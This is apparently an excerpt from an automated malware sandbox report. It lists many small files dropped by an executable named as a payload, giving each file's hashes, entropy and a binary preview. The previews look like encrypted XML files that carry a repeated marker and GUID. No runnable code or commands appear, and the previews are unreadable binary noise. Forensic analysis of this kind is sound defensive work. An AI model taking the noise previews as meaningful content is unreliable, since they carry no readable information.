                                                                                                Entropy (8bit):7.716038736975248
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Dxg8A8DRVjI0Mkeg8Ywnws9dKwpBpnv98gx3bD:Dm8AAvjUFYWwl2BJvdLD
                                                                                                MD5:D3A5D96AA74FCEF12ED29223FF50E066
                                                                                                SHA1:ECD59BA5C67153173000A66E09238CD9B8DABECD
                                                                                                SHA-256:31B73FC57BB085F901163681093DCAB447939AF20EA3B440FE35757F032A4743
                                                                                                SHA-512:E7F1D9D012FAD6EBF2F9FCA626A53FAA28E55EB6D9F70F50C2426D28C8BF9C67922E4553FCEC0A464B1B3D860C0AC3D319AC5A8767C9AA6C8EE35FCA3FFC03CA
                                                                                                Malicious:false
                                                                                                Preview:<?xml..... ..[(..7..h.).0.z.e.m........F./.c..t.Q..y.j.&.........eT>u..~....i...jLS.....py}0L.<p..p.C.w...A..M.a%..*...E..xo?f.f...|...6Q....P...9l.:.\j.....ha..v,.2.....bIQt.'.........r..].4h.......]....Lfn.mA....\....k...;l..(.n.^..2..v......J...JU...F../q8...jN.g.T d...ZgGVB..w..U{-.....m.......Nz.(x.........Ik.f.....w6.....]1A.<lH.e.R.V.F.K.#Fx,...3...v..k..%..t.!.j...^<.T5....e..W..P.j_....--.T...M..... yC._%.~j...2;....Vq.>.].!@.-h....C.f.~B..)v1.!...<..<.(....%.oC............f>...{#.$.Y.....HN.n.S.".&.#O5..0..zw......K..1WL%....#....Vv.q.......}.....\............=/.V.K'.8..|<<..o[dC.x..a"*.....).a:...~.W8<.s.E=.(>..y.pm...5.....2A.....A.G....Q......EZ.i[BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):824
                                                                                                Entropy (8bit):7.738614992361906
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:noTj0LNWushlU3CDtdIM404DvYY2CzkYft77uj1KbOe45n9e9tgJc3cii9a:nOALNrmJtdx2DgY2CzL177frCnMtx3bD
                                                                                                MD5:A40009FD2EC2106140A155152440722D
                                                                                                SHA1:636DB4EDD569D3DE093EAE34D5D96F7C487E1806
                                                                                                SHA-256:5CAE9189BC9A3F4D2C33DF52F8DD3FB6D4F2A8E65718C3D6CA085A2C62DD9C2C
                                                                                                SHA-512:A124EB7FA5DB18C00D50F0F1B6A52313E72B76E9AC7172E6E0A602B182BD31306DC9656BACC64632A26BD70E0025223D4A924BCFF9719BEDEF2E9E6C85A2E542
                                                                                                Malicious:false
                                                                                                Preview:<?xml.}n...o..ejD..*......?@.$...T.Z..Q...2.aD.;.0..........[.EI.}.A...............9Zdm.._..[Q.(fp.!pGb.}.p.K........JkY.(1...<..c...VL(..i..=tLu....#&3b.. ..L...V.lj.v.%.o..`..67.osr.3C..G......s..2..id!.il%........0.n..K..{.\.by..N.\.{G.m.l...,B.....$.....{(v...{S....._X.....)|..R.8.. }$..W0u.b..u.$.....?..R.....G.w..}..Z.....)....VM........43...:^.....K.....]X..t..S..'.lN.5...p.>..C..~..m..E\.b..3*=...LT|7.2.Y......L.Uh. ..I......U/,.Iu...........^0..;.o.%...9.nS.........g*.p.;+LS.Q.;c^..E...%]...1.....n4.r.I..GIr..,.b..d.e.6^}.(...`4._.....Y`:!a.r ..>~-.......].&i..?.~f_.)$.c.O.x...D....v.......l.R..C.d.. .n....WF!s],....D..kU...Z...lL.AD.=H....{....R....ZJn.z.\\...[.|...'p}.....[.:o...,.(BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):749
                                                                                                Entropy (8bit):7.69740574084099
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:CMYJv60HHSMOeFJo0L4o3f4J3bnQJgOknGvyL21nlV7xCWFGa52sClGnYfL8QVgS:3KvBFis484JUgOknGV1g7a5RCuYfL88l
                                                                                                MD5:F48CDBDC174F4FDCBCFD12042F2EB9F0
                                                                                                SHA1:D657406EDA0B17FBB6C1D4D6B19F7699BE3CC719
                                                                                                SHA-256:EA55A0B83DE711DFFBB34A1FB77D20EA2A526A8A24E044B3A1CA585B8D418312
                                                                                                SHA-512:3E3B9B08274BC11D54613C5AC41F8698C2912F9B707A1D32A7999987F8801E047B31E9AC2072F981054A40AB943ECBF954733A3337BC6ED51A204F345E960DAE
                                                                                                Malicious:false
                                                                                                Preview:<?xml$.k.]<.o.s.%.~....h..]!u.T..ou......*.......VDb..b..9..U#...(..G.}."OHxT.....?;47=...xk.tec.B....pq#...!....I....LL..GL..k.......K....>.|......8..d[2.g.l.,....K.S .u.@q..~.|..d.........NV....D...t-.^N...dx.v..^..N..N...k"4............Q....nE^9.a[%......z[r..........=}..5.d.3.qlp.7?.K8~.,......zU..Q.h.$....ju....Y.....vq.......@.N.A.LU...N..r...q}5..s...>.8.....w..%`c.U.l.........zD....>8.....K..._..]-.C..=.a,-..~.stI-.#./........ .q......o\....F.....*"*A\....j....O...g|.........&..:....H.|.c..........MCR...Z...|j?L..E...(X.."..h.,..3...>z.y..:o.....d.=N..1op..T...[.R._..G#.j.{W......o.z.+.g...#.N.n...5Au,.G...(.7."BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):812
                                                                                                Entropy (8bit):7.722889417006238
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:sKSYFsq1jUfHUmDwV2lfmA01ELpvPiOmegln3ZGiOIWWIrjTSe2AgJc3cii9a:stksrfss01EFSOmhABrj2eHx3bD
                                                                                                MD5:B6E5507EF6909E1C2D4DBD32FF0A4D28
                                                                                                SHA1:DCD4548A376FF837136CDFD8BDE8536F50A8E3E8
                                                                                                SHA-256:FF7B5103373E8DD72310885BD3E7ED87514F3DBB65DEE991813289F293532BAA
                                                                                                SHA-512:BCB9C5ED06505C063508AFD3F282CB6274889F19C56B78C9E5D715330CC10E216654EE8A6204F32C2DF03CEF6F8D18798EC74DF5711FD2D4F091D11C54BA62B7
                                                                                                Malicious:false
                                                                                                Preview:<?xml.v..g....._..w.lT.^F.mD.N..:u.U.?...1.yS.g.......Q...?.*...dv.......\.=f&........p..)..7X..0.B..^tus........#..,..(........S]..B.....,..l.#..`...N.t.i..oO.U..e..q{lG... .(.5....f.......e......X...#/B...ZEn.&s..).t.TQP.......a...M....d...nT.7..>..4,T.3.HJ.z.QH:..X.....5C..n..Z...w....D...3u..o!.Q.6.FD...@...dm...OqF...w.s6`;?...^.e....`.O"3WY...K>.`>.......n%..X~.z7...w...x.+.....o....U.%.E....m.....4#@.O...S+u.f.9.V<9v9.a}.j.....y.q.>lh[...,.>+.l...N.`XI.[W.M.sar....<f..B..m.$_z......1....d.a...X.y..a.$..E...c*....c0...#y.x....@.*.3.=1..:..TY.*a.{..G...e$.t~...>...YU...z}....._.TI).r.M.*..gL..5.xKBV6<`4.:.T#...X..D..x.+Nu...x..K....m:..K...nEt....*Jt.....Iw.Q....|...B?..d....}{....4..R.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):748
                                                                                                Entropy (8bit):7.716943921941853
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:OYa69f4tvc7Kj0n8UTIS3MRnHK8J4rBTafzTA1yMG3BBJ52NQMT6jqJa115gJc3X:OYa69QtOSy8xGMzCBTa7TTprJ52+AsqU
                                                                                                MD5:D46A9BF0BC61497C799E9AC507CD1DCA
                                                                                                SHA1:B03377279A35549EBF35EFD1026DD4A7EB5A8266
                                                                                                SHA-256:7A76CE2470814FFBCE768F057E2516AEF80D71B490A364B445DDA85298152EC6
                                                                                                SHA-512:9B9D1078B1B6395EE4343F707CD061363E9398C771B229C67811A2F1B35421E30652ABF1C837984F26D9B275A113020EF8150DB4F704393D2160FAB175146A79
                                                                                                Malicious:false
                                                                                                Preview:<?xmll..p..q.Oa.|..>.z.A.*.(..N.r...$.+.E.:g.qN..o.....<..j.&.gZ5.=.<..K.../.....[.LM.....Nzc9ha&..r...L +7~_..E.oU.....eR....w.e..D...*e...K+..R..M..*....fm~.R..yX..b..#.&...B..&)B...`......IX..CL.V..Nv..??.[g.]..^..-...z/p..i.=.........e ..U....(a....B.>......u.....>f8...o....T.9=.....,... ..K..,-/...+z!......_2.......T.|.../.l.9..`..n.*..(w.l.|..I.bJ....B_ ..7r.p...l.....h. .>...s..`.!1c..`..........~..N.7D.#.x.Q...e........>.E...%,.I...\!...ox[E.K..0.....^..B...y|.k.R[.L..q..W...h...)..gG.P4..G..\..H....J5.0:..._..`6....9CX.v.d.......ME.\...b..?.p..h.!..G,.....v..yz..z......o.o.1*...D..../....F."..[....OPS|..9J...'.."@.k.SBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):804
                                                                                                Entropy (8bit):7.695990876647276
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:oL0sgYfb0O5E5nO2CCvcGgJ2F0Mmieny70Vsx3bD:W0HYD/5sOscGE1ij70OLD
                                                                                                MD5:19FB0DD36BE21BD5248D076F17EB8BE2
                                                                                                SHA1:F9400AFC7859BD66B08309519A53597CCE9AABA6
                                                                                                SHA-256:26C8379F367BB1E264CA1C2F729A9BE0FC11828DECB61060CF4DC075A688C44B
                                                                                                SHA-512:50A8308D8268BBB1C77ECC795ADC8373CEA447206AB668C66A629804496FD5BBA07245BE0A2EE1C0A7B0B0C173C358A0E4BF38408FB69EDC3E223B3C999864F2
                                                                                                Malicious:false
                                                                                                Preview:<?xmlU....=...!.1.o..H.K.kZ.yA=B+.Sd....4...f.v.Y.^......x#,.~.[....'..6.C9...=}.....3z..s`...2.T.d...L*....\..Z..........v.W...P.R...c...i.We|m...;..!Q......[+.../9..J./...K.A.^.D...^`.C..T.P,s..'.....g\sH..y.lz.k.nT.E>.......W..+`..h..O...n......Nt........7......w.2"fz.ua...>....v...&..>..[>....."d...C.>.D....t<......_..,......G...%..C.....0~...Z.L7..zv.N.LH...s..F.m5..j1..\.F...!..XY.[~n.......y...>......B.p\..e.kH.o...?6VS...P).M.........e.:. .+.H...N.....>l....5.}.A.t..5o.....9.Kv...d.l.....P..@B.k.p...J(....4A.|....}.5.UEk.y2....?B7.Jp...C.7..<.1]*:......,..j..o.H(.r...IJ..'{eA..o....t....z..6...n.e..6......kT`.`.5.X..2...K.P..H._..7.w..#2+@.%...n...?.GS..L.a.+.*.....UE.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):752
                                                                                                Entropy (8bit):7.726031354972423
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:ggs3b1BowdJtXOLMCTibuPQWFU3Awj6R8qnIcUmYz1twX3NYggJc3cii9a:gpbswdKwCTuC7FUQwuRnJAcX9tx3bD
                                                                                                MD5:8BDE42A7D25870049DB35E8B6C950CB4
                                                                                                SHA1:AA39B8169D394DBB81C9E336CF57B0365832A96D
                                                                                                SHA-256:8BCFFB65B5A7655F72A4D84E1141AF2FA736C7A3E7A4AECB6C25F8D5F58740FF
                                                                                                SHA-512:0BF095469A2A61B9DE784DB21B662462FE69FD3B928E281B1AF1F287FE226136C83D1DE2486233596F64C95B3615BDE7BCDCC3655971A91A34D6272B025DC23B
                                                                                                Malicious:false
                                                                                                Preview:<?xml.1..L."=I..s7...1...R()..........;=..3?Q(0.l"h].......Ha..../4;7....i..Z9.....$.......5.-....R..v...QO..{b..P.U...5.F...]....hZ:.. .V.....8.%)F...dw..v.>...z..\...H.......".:..RGYqBS....bZ.)+dPk[.w..d.... G.m...5..'j.... M6..br.(...?u..I..S..8....s..|.c.....'..2-....zV..W\.t.....l...v..|.P....<.*.5..8.........h+..*.....B.F~......t."T...P..H....@.A..*.J..y.....Q..~.4..,.~`.5..B4..._.5.K(.m....^p.".MU.P.}N.}.I%5ok&..:.z..n.QU.....f.21.5..d.u.c.9."...n..Z1S.w|..t~*..t...0.8..'..7.v[.0.6..;..o........._..ku"...@w.y.g..;...N....R..!X~q.}8.)\..z.>[..&/....../...2.V;&..f..A.N.....pq.i.....RvwW.@....:.);.u....!..(...i..@........l...%v..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):810
                                                                                                Entropy (8bit):7.718676327815127
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:j4OCrBs34HpfikB2UL/Bzy36JzLpF+fJUxZ9Sx3bD:j42wB7jL/Bzy38pFdZsLD
                                                                                                MD5:C6EF5F34F429C1DA573F450D7EFFA0B1
                                                                                                SHA1:08E79A7BF15F39A5DDC39F8B291BB1380A111C23
                                                                                                SHA-256:E05D5BE812F8416526665888B761CA0E01986A09BA286073CE5711694223BA6C
                                                                                                SHA-512:61D6F7ECC70360CBB11A686083B42DD10C236FE2B3D15C8CCF9EE90B04E8FF489ABAF78E6B6566E460C1C63FB39D457F458FF4D5D21AF04EDAEAD40A1DCB05C6
                                                                                                Malicious:false
                                                                                                Preview:<?xmllp7...A..d..-.c.[.k......!..rT..s.xaM....].fhc....A.......b...,{.w....w...j.<.....[DLm.$C.<.g..%.hN.K...!.T..<s.1./...8..o.Dt\y..#....R[...-..n1.-.a.b..b}(....Y*..$.h!I,.+..P[N`*......b...U........K!`.Fw..*.l.&`..S...ezK.H...NT..`.....D..FKOW...O..%..P(...{....S....a..O(...4..VM.Q\.ViS......L.....|.t..(.J.b....C....%.N.......N4...K4.Q.....~=uK.+j.'..$....6.2...*.4....!..M...P..1...YJ.ho.#(.h...*.%.p!.F...1...}..Zn[n....=V..f.......Lv....a..mf.r.......JL.^.:dX.........6..@.AQ..c.............o...Z"...K.....B8H.9..p?E)3.Ko..'.Hc..(w.3.%&......?...^yh..|"sS.N`..a.N..M.;...-.xLW..@i Qy.G.1kJL....s.O[..f.g.4..T.XVt&X.?0....E.... Y/<i.9.J.. .$.eh../...s.u?...0/..3u&....~.....|q3F.3.|.X..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):752
                                                                                                Entropy (8bit):7.711992474695391
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:gHOLtx6wH8KAy2eBp1UFnnpb2bHbmnEThs1qozitJCh/GwwUdSgJc3cii9a:gmqK4eBjmJ2bVs1qozlKx3bD
                                                                                                MD5:DC9E13C75DE97EAD6B2EC34BDC770C7D
                                                                                                SHA1:B182C8A37DC376262238F31E19CAC3270E0B7A04
                                                                                                SHA-256:EF856EB97F5B88861B63B8C83BA5F472E22DE75AA44F492522A9AC1919AE6E07
                                                                                                SHA-512:5E3AE17B5A8BE46CFCEF29592B8C1F01D3636AB593910F2DD48E1E3996835AD3228E334CD0FD0F233162A7BEA6E5B9EFC17EE76FEFAA2AEF5ADC078D06AB23C2
                                                                                                Malicious:false
                                                                                                Preview:<?xml]b.y._w.q..s..n..7T.q..d.3..X..:.-.....36n.k.g?9..Y...)........8.H...$D.$..2.....V..>......<.."7.(.V.e@U..WN.9..o....k@jd.E.eW.lS;..P..W....P..}c.#.`..5~.].....,&w...k..v.F]..n....#...2~|^a..v.....".:.y....R7..!.?1.(..m.!1#.....bB..&.1b.....D....TYp....=.>/X....2...........l"V.<.,...^.../....X.I..r.4|...!?....)...Ky.o.-..=.h....[..K...1.......i.7...e........U...Q>!....Q.X..~&?u.-......>...JD....&m*.k.D,.o.O6..|.."..)D.x....7-\..!.z.q.....:..>)!D=ev..!t.../ Y..{...2g@..n....J.Yi.9.$..:mVX.....P.?[~}f,...*..G......:.)n&.a....O..K..S.7.>..T..s'....I..Q.*.1..I.k. ...^.oAWa....i.."..$L.\.1q...~~[2M.....Z...E..'.5:.%AD..e...mH_S.......BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):810
                                                                                                Entropy (8bit):7.705484127505542
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:AXpqim/QQsiY6xzST+H01AgjgE/XUdRw1x3bD:K8im/QfASaHqAgjnXUd+fLD
                                                                                                MD5:B8365B55CEB01CC9219F375E0F2A063F
                                                                                                SHA1:5233E9C4F32C1A96372F2989575C3803DA188FD2
                                                                                                SHA-256:10A3D8041A5B6D2F6EAA83434B92B7FF421A8DA2C301F93122C255F2FE0FF2E7
                                                                                                SHA-512:4A741C3AEA5C25F940E629D093B26428588FC94FDA02B628DF69E878BD68FD0AEE969C84FCE36885FCDF3DB241163A82DCE0BEE26959AA040E99FDAAE262C53F
                                                                                                Malicious:false
                                                                                                Preview:<?xml;i}b#.ei[...<t.../.@..!.e1d..:..2|.@...j..........j../.!.h%c..:.b........+&1g.u...O9...B..2~.`...DOx..K..5...j....]......fp!....m...aj....D.J.k......&...\3u..S....{.R....10....+M?k.[e.......|=..Es.W.-...h\.._..~..~x@..D......k../........c.. H..S...;...1.%.%...R...mU..e..Wp..c0,....?.<..(...a.40%.'...[.g.[..M.3.......M<>gKnV*..?.>......z.n..,..OS.J..)P.s..f.n/....S&M#..gK......."..:.....>.kf..C[5.%.>...=....vo.*e.Z.;nD.}....r...~.2!..;.\O.g_*#.$@.....=.Q.R../.......1^...L.~..-t,f.m7P.^.@S.g.W.......}#.M..w...4TE.O..-.2a=........Y........;...C$s.:.~d.y.N.!..U...B..od..f.P.[.w......@....3.........b?.*gD:.tO.a6..0^.....PM...6z.3..$7].`...9../...$DI.v..G..k3]9...N..x..."....X.Q......lK.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):752
                                                                                                Entropy (8bit):7.707837751663248
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:NQQpjBWw9FpRyu/vdB+0Z48UNDsPDQ/5IdeyEo7P+P4NbMsGJgJc3cii9a:+QpjBW4pRyu/vdB/Z4537e7PQJx3bD
                                                                                                MD5:A2DED1E1108FF85E0A996560479933DB
                                                                                                SHA1:C6057F40BC2E7524EFCB8D6B638525CC4BA05408
                                                                                                SHA-256:4664F527073DC8F5AA7B8D97AB384CDBAA6A2A0B221FFBC97C57823528CC23D8
                                                                                                SHA-512:708DCD78E86E9CC9719D24E924F6C1222562551C2D078806858D0D259006907E5B6DC343E2818D3B0D5012747F458730705634D08D7E2AB1627D88EA677A30AC
                                                                                                Malicious:false
                                                                                                Preview:<?xml.jv...rM#.....1.j....*.h....w.n.c.~Z..4.F[..(..R1g]..c.-..~(.@..!fy/|.'7.\=..K,zL.a..C...:...\....?..m.>..#~IZznZ..e.p\VJr.b).w2..G...p.A..-.Bc...6......>sV.hX.<"C.z.x*Y/cKq..8duD....?H"...b...C..........fC.&....*.;.Bveel........... .}.n.yR.u.E..;?BR.iAM....(.h1b...z...V*.9S.8.x.u..".+.N..5q.j_.v._..)......o*j2....gc.A$.Y3.>..A.......|L.H.....@....(.1..j.(..w...d....A...0!."...P...h.d....tb.%..d.&_..........*)1......e.....NZ./.K.....T~P...W...*.L.Pp..H...-.*..f..l$.N......h....+...W91.t.H.z.........2..4|..M..X!......x.........o......o. .8_)p[.9.4....*..H...&9......X....O.)h..eDO.....b-..........4.*..<..T....Q.....K&x.xp..4.._..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):805
                                                                                                Entropy (8bit):7.744818447784187
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:k+tGRllu3OzVFZ2McNkM153iwAZnax3bD:lGRiYVFZ2CM15SwQeLD
                                                                                                MD5:604AFBB78FEFA0355AB40FF4DEF639FF
                                                                                                SHA1:6D48C24B78D40F3338F957A08A92417BA555DA18
                                                                                                SHA-256:2DB61120E2E560A7FE8608697831B5EF29E50869A30A733725BE1AAB481909BA
                                                                                                SHA-512:1D0C7A3A673A846D75E56FF3749D74808F29DFDE93B4BD9FEA58A6001DB2BE21318771AFC32040340834AA06A0D3CCF95D6A3B0D332D59A5B994BE4FED714B36
                                                                                                Malicious:false
                                                                                                Preview:<?xml.....`t.%....iP."...,k..b..'....(3.|..%.. }..H~...B....0.Ze.....|.....r..dF.R.F....N.[m...l.L.....}..y..|.Q..'.......v..G.*.....f...&\\.B...6........m...r0..+P..G=w...:*.......U.=......L9...7.{N.....w......".?d.T$..R..^..}..@..R!W....]n........A2...:..<E..gC)t!.^zd.....n.o.I....H....n...w5...Z..`].k........F..n/.HM.......D.{...p..B..b..S.._8.......|i..62....OP.$. l...0..@....psuK......R .$(..E.*.g.v..;._.w0@.#u...h......t...........#g..!......:...}%..0X."*B...M.4..3..z.l...sE.6g.F......Q.q....'.!h.=...uu.hYt.Da.{.%j........#sUsR..S....0...D.p4.C..d./..Z~..>&{..d.y.../D.C...Z.y..a.2..M6.Xrp.8.3\.z....M..r4..X...#...m.tB.T.w.rX.....(..e.R......S.6q.@^........-...8...._.6...BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):801
                                                                                                Entropy (8bit):7.701368680842814
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:JJhReLKvqJrhyh03s7gjQU6Wbmo8Ie/Ax3bD:JJPeLKAcGsEL6WbmZWLD
                                                                                                MD5:E56EC3C8418A16668AE978F774AE580B
                                                                                                SHA1:488AE77679D70A4D90D6F3101E514F24EA529F0B
                                                                                                SHA-256:097748F2806D81B1A2498CF527FFA1E9981A59D894A3A1DF0EBE8DEF30B440F7
                                                                                                SHA-512:C0376ECC5222F1654BD4B047250DE85E6EF3C67930C8C7C330F702F23FADC471CE45C465C02CFBD7A6630A6379C4102672B74E45EE6C292C1504F06BD427777D
                                                                                                Malicious:false
                                                                                                Preview:<?xml.A.........Y..`....Pl.z/.?>....[..U..p$.....<.=...RK.....4tI...;(......G)<......h.......Iq...#.....g.pU.K....|o2H........1........y.>..uB..U.a.d..p...dX9..2......?Q..Tx...!.Y...n.].J...x..'0.....8..1.~i....R}K...J...B!j..P.h..<0le..P.......vr...6....>...n...d.8I..t..........A'2.ar......]...(...0SQ.9..A*..1.z)..k..w/H.+......v.[....8#..."A........6!...q.)....d?}........6k..1e...0.].....j.?.dQ....!!.q..S."...o.g..J#......=r..m..#l.1;.4..Q.)...'J.KkR.K.S|#..<..P8qa.N-...4..kN.X.f.R..#..n[...,...Wy@EYS.....4V....0..C..{k......f.|.d_~..0..[....h('.q.bm..yp.9.}}.I...L.p=.......tnZ. ja....i)KR.z.lP...k..gK....c.....y......6n..w..ubS.....R....:..&.._:.a.....~..d+)*.:'..J.._sR.....@..Q..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):818
                                                                                                Entropy (8bit):7.76164387893207
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:fInVLG6cgt2ptGYIYVGXUeE7nSuEZnzKRwlUBTKchgrPryWmV0upaGBiw85gJc3X:fWwfIEd6ZzWjTjuDrjcaGBiN5x3bD
                                                                                                MD5:42CEE2FB7727F075A6C40A776046CF9E
                                                                                                SHA1:9611A85E4CE31783D1C1B437CA42F5677E87A8CF
                                                                                                SHA-256:3F0AADAB01F5D7EEABACA0455A99AAD49B4B3DAB52A4880EE8398657301E276A
                                                                                                SHA-512:8E0BDD4D092B266ADCB2EBF0FB9503E96E697A3D7F6AF36B7C2E2575BDBF618BC514ADD6CBF7DE301C7BC3A39407D91B8BCB838B26AFB4852C1002812865131C
                                                                                                Malicious:false
                                                                                                Preview:<?xml..Q..raf..VXf...D...1.8......1>+..`..D..H....T....9._.*....p.?K....t. ..}.;.eF.*s\...u.4.......".,6..9.........(...5V..m.*|6..Y.^.!....l!.4.'.cy...F&\0f.............fY....'UD.Vo!.".3.-(.p.)...pI.:...N.{$.......k..N.....h...r.@....H..../.m]......1i........^..(.Rz4x. ...6C...=.y.q....d.(@3....#.......90....F.JB.i.T..\TC.,...r..<.H||;n.47.h]i..\.f..I....(..|..Q...L...B.+.by...E|\9f.#P^.m,..Rg..Tz.y......o..@..4]N....L....u.F.h.....0s.N.._.@..: .....a....P....Z6.....'...,l./....S..z.[j...ETms....c...wD..=.N.9=n.l.:M8.T.j........n..u s.dR`......c."..}/g'..r,.....F`........M;f9..%........t/...D#.`wP7..v.....wb:r......`...'.G..9X....&....|/*..:.Oz......nL9.+(.......&......7.V<E+.x)2j#....V.\....`lBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):744
                                                                                                Entropy (8bit):7.689263811453969
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:SJk5zmZ67UdO2IHIxw44Skvz+qXCmDpn5feIad6uoDT9m72R3/C+MttqMhCnzu9k:UkBm07UHwlXJD1n52R3wT9myJ/C+OtxI
                                                                                                MD5:4C8066762934E7040B43E3A7B876E0C5
                                                                                                SHA1:B86DE0447E2EBBE9B2DCA87042FF9421DD670685
                                                                                                SHA-256:942D1B744CB8262800307D6BA957AB9EA1B411EB6750A780633BEA39B83A6F17
                                                                                                SHA-512:DE38E57ABF0878C821D670A90CE11A9F6FAF7A36141EE39A33B683A199560AE66736F76E52A8400427D6B161372513E880224B8C8E5E5012C4F36CB9961E22A2
                                                                                                Malicious:false
                                                                                                Preview:<?xmlo..VK..DG8.SM....>D:...0.1..t.]..".ZF,S+p....b>|<J.M.-.1^.F.r.9.y.vK............e.|.eE..pX........5....EB.d.k.i..I...p3NN>w....?..\..Fu...Ya.....WY'7."...N..M5L..di...%..6q;M..+.c..<...l.9|e...'...c2.3+.#[.Q....Rxg..x.....G.y....A...C.,..J.....q.I.i...}.Y....."/.;\l....J."Jd..s./.:...#...i8....Q......N..........4..-!d..>.4i.[L..^.....{.DK!.E.......YC......@..d./6.(b.&."..PU=..si.HQ'9.G.G..in.,m}.KYx=E...=..Q!.N..c;...17FZ.[o=T......zt..........3.u....K.8-;.zQ............(0..\<..Q....r...g+Z.Uj..z.......s]......#Sr....7.T.w...xp-......&...}...a....%........3.+'..O..>....pZ...g?..J])w...oVMw.X........*q.x..].........~BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):803
                                                                                                Entropy (8bit):7.693864303227112
                                                                                                Encrypted:false
